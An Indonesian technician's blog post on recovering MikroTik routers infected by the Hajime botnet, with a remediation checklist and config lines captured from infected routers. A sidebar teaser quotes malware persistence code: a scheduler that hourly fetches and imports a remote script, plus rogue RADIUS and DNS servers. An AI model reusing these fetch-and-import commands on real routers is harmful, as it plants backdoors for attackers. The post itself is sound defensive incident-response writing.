Langsung ke konten utama

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

cctv online mojokerto,cctv mojokerto mojokerto cctv mojokerto jawa timur,live cctv mojokerto,

email : ariyaandro@gmail.com

Dear rekan teknis,

apakah jaringan anda tidak dapat diakses dari luar kantor ? selamat penulis juga sedang mengalaminya dalam semingguan ini, dan baru tersadar bahwa itu serangan masif terhadap khususnya router mikrotik ke seluruh dunia menurut beberapa sumber yang ada. namun sepertinya masalah ini sudah masif sejak maret 2018 hingga sekarang…

bila ip public (khususnya yang static) yang sedang menempel pada mikrotik sepertinya akan ikut terkena efeknya. sehingga bila ada koneksi dari luar kantor akan terkesan putus atau tak menemukan ip public, atau yang sempat terlihat penulis bahwa beberapa koneksi luar masih bisa masuk tersambung ke kantor tapi lebih kebanyakan terputus (tak bisa di ping).

langsung cek lah mikrotiknya, dilihat sekilas untungnya tak langsung serangan total terhadap mikrotik. dari 3an router yang ada hanya satu sepertinya yang full ter-inject setting mikrotiknya (moga aja begitu) dengan mambandingkan 3 router yang ada terlihat sepertinya tahap awal serangan akan membuat rule baru pada firewall (atau sepertinya ada yang sudah terhapus total rule firewall filter nya) yang terlihat seperti berikut :

gambar 1 : contoh rule firewall hajime botnet
sumber : https://forum.mikrotik.com/viewtopic.php?t=134965

itulah rule yang terlihat bisa sudah mulai terinfeksi, yang sebelumnya penulis kira ada penambahan rule dari provider. tersadar disaat ada masalah persis seperti di atas dan langsung tangan menggeliat cepat seperti ada info kebakaran gedung…

jika diperhatikan impact yang ada maka awalnya memang koneksi luar kan sulit masuk terhubung ke ip public kantor, namun akses webfig nya juga tertutup hingga service www port 80.

gambar 2 : contoh hajime lainnya

pada gambar 2 di atas terlihat sama rule nya dengan gambar 1, dan terlihat keterangan yang diberikan hampir sama semua terlebih ada kode BTC (mungkin bitcoin).

dari gambar 2 itu sebenarnya sekitar capture dari 3 harian yang lalu dan waktu di cek ulang ternyata sudah imbas hingga merubah nama identify name mikrotik menjadi HACKED , selebihnya belum menemukan lagi dampak rule yang ditimbulkannya.

berikut beberapa hal yang perlu diperhatikan awal untuk dikoreksi pada rule router mikrotik :

  1. jika router anda sering di check point / maintain di waktu tertentu pada file backup, maka langsung restore saja ke point restore pada tanggal yang dikira tak ada perubahan dan pas kondisi aman jaringan kantor.
  2. jika ingin membandingkan atau mencari rule mana saja yang aneh, maka backup dan bandungkan dengan backup config mikrotik sebelumnya saja. lalu lakukan penyesuaian ke semula. cara ini lakukan bila sebelumnya ada rule yang cukup banyak yang ada atau yang diterapkan pada mikrotik dan lupa backup nya.
  3. awalnya langsung delete/disable 6 rule yang ada seperti contoh gambar 1 dan 2 di atas
  4. pada firewall periksa pada address list, bila ada allow-ip maka itu hasil dari hajime pada rule filter, hapus/disable semua kecuali pada rule anda sendiri ada penamaan sama.
  5. periksalah ip DNS pada mikrotik, lakukan penyesuaian kembali jika berubah
    sumber : https://www.dodiventuraz.net/2018/05/cara-mengatasi-serangan-hajime-botnet-dan-chimay-red-exploit-di-router-mikrotik.html
  6. cek dan atur clock jika tak sesuai setting semua yang terpakai, pemulis mendapati bahwa auto time zone status NO. seperti contoh script berikut
    ________________________________________________________________________________

    /system clockset time-zone-autodetect=no

    ________________________________________________________________________________

  7. periksa radius mikrotik, bila ada yang aneh hapus/disable semua yang ada dan cek juga setting incoming nya (jika tak perlu maka radius incoming set accept NO saja). yang penulis peroleh dari capture config yang terinfeksi routernya ada serperti berikut
    ________________________________________________________________________________

    /radiusadd address=47.75.230.175 secret=test service=pppadd address=47.75.230.175 secret=test service=pppadd address=47.75.230.175 secret=test service=ppp/radius incomingset accept=yes

    ________________________________________________________________________________

  8. periksa service yang ada, dan sesuaikan dengan kebutuhan semula. ubah saja portnya jika perlu, dikarenakan menurut sumber yang ada ini salah satu sebab bug webfig mikrotik.
  9. system log pada mikrotik kembalikan enable semua (yang awal terifeksi ada yang belum di disable oleh hajime nya)
  10. periksalah apakah ada script yang terlihat aneh dan cek schedule script nya mirkotik
  11. pada systemm note router ada terselip kata2 intrupsi, penulis menyadari ketika sedang koreksi rule config dan membuktikan waktu buka new terminal
    ________________________________________________________________________________

    /system noteset note="The security flaw for Hajime is closed by the firewall. Please updat\e RouterOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\3nUgsdqQawiMLC1bUGDZWHowix1"

    ________________________________________________________________________________

  12. periksa system identity, tahap infeksi akhir yang penulis lihat terlihat akan berubah ke HACKED. bila terjadi maka tak usah panik, langsung saja ganti namanya kembali ke semula
  13. buat user baru yang full access, lalu disable user admin mikrotik atau ganti password admin
  14. selebihnya silahkan melakukan tahap2 penyesuaian kembali dan membuat rule penghalau bila masih di khawatirkan terinfeksi.
  15. trakhir coba finishing dengan upgrade RouterOS jika dibutuhkan sesuai rekomendasi sumber lainnya ke 6.41.x atau terbaru

serangan wabah mikrotik ini berlanjut kembali, mimin kaget lagi deh….

Mikrotik : Wabah september 2018

Mikrotik : Wabah Oktober 2018

TIPS !

mungkin bisa dibuat sebuah schedule script untuk clear semua firewall dan add rule minimum yang diperlukan, lalu di mode schedule per startup router mikrotik. agar lebih simple dan cepat recovery network dalam masalah seperti ini.

sumber yang ada :

https://www.dodiventuraz.net/2018/05/cara-mengatasi-serangan-hajime-botnet-dan-chimay-red-exploit-di-router-mikrotik.html

https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/

The Mikrotik RouterOS-Based Botnet

https://www.corero.com/blog/882-hajime-botnet-scanning-for-vulnerable-mikrotik-routers.html

maaf bila ada salah kata maupun istilah, silahkan memberi masukan.
salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

cctv online mojokerto,cctv mojokerto mojokerto cctv mojokerto jawa timur,live cctv mojokerto,

email : ariyaandro@gmail.com

Komentar

Posting Komentar

Postingan populer dari blog ini

Mikrotik : Wabah November 2018

email : ariyaandro@ gmail.com post yang lalu yaitu : Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia Mikrotik : Wabah september 2018 Mikrotik : Wabah Oktober 2018 update temuan script hacked yang baru lagi,…   /system scheduler add interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\ han. pythonanywhere.com /\" dst-path=tmp} on-error={:put \"get http error\"}\ ;\r\ \n/import tmp;\r\ \n/file remove tmp;" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\ mar/31/2018 start-time=20:21:00 /system script add name=script4_ owner=xxx policy=\ ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\ ddress= 95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\ lt=no"   /ip dns set allow-remote-requests=yes servers=" 94.247.43.254,1\ 07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141 " /ip firewall nat add action=redirect chain=dstnat comme...
Posting Komentar
Read more »

Troubleshoot : Cek dan Menurunkan Beban CPU Mikrotik karena SPI Service

email : ariyaandro@gmail.com POSTING 813 kapan lalu mimin mengalami kendala jaringan yang sedikit melemah dan ternyata ada gangguan load CPU pada mikrotik seri 2011UiAS-2HnD, lanjut gunakan tutorial berikut untuk menemukan dugaan yang ada Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik akhirnya terpantau CPU tinggi walau kondisi idle di luar jam kerja di beberapa minggu trakhir dengan rerata CPU load hampir 50 %, pertama untuk meastikan disable atau hapus rule yang tak terlalu wajib utk sementara. namun kendala CPU load cukup tinggi, dugaan rentang sekitar 2 minggu trakhir ada update OS itu yang mengakibatkan ada bug yang berimbas ke service SPI. dikarenakan router yang sama di lokasi berbeda dengan OS update yang sama dengan rule yang hampir sama jumlah aktifnya tidak mengalami load cukup tinggi. Cara Memperkecil Load CPU Mikrotik hasil pengecekan tool-profile ternyata service SPI yang sedang bermasalah memakan resource cukup tinggi dan merepotkan traffic jaringan...
Posting Komentar
Read more »

Troubleshoot : intel management engine interface - shutdown problem - can't power off

email : ariyaandro@gmail.com POSTING 797 beberapa waktu lalu mimin ada sedikit problem yang menggangu yaitu ketika PC melakukan proses shutdown selesai, power PC tidak bisa langsung off sempurna (diakhir proses shutdown hanya dim warna hitam saja pada layar) harus dimatikan paksa. namun dengan solusi berikut syukurlah membantu kembali lancar shutdown dengan baik. spek yang sedang digunakan PC yang problem ini yaitu menggunakan Windows 10 Pro 64 bit. setelah mencari artikel yang sesuai berikut https://forums.tomshardware.com/faq/fix-intel-registered-management-engine-interface-has-a-driver-problem.3274586/ https://tencomputer.com/intel-management-engine-interface-driver/ https://www.drivereasy.com/knowledge/intel-r-management-engine-interface-this-device-cannot-start-on-windows-solved/ https://community.spiceworks.com/topic/2095008-remove-intel-management-engine kesimpulan , ada kemungkinan masalah driver yaitu intel management engine interface. maka dilakukan rekomendasi uninstall driv...
Posting Komentar
Read more »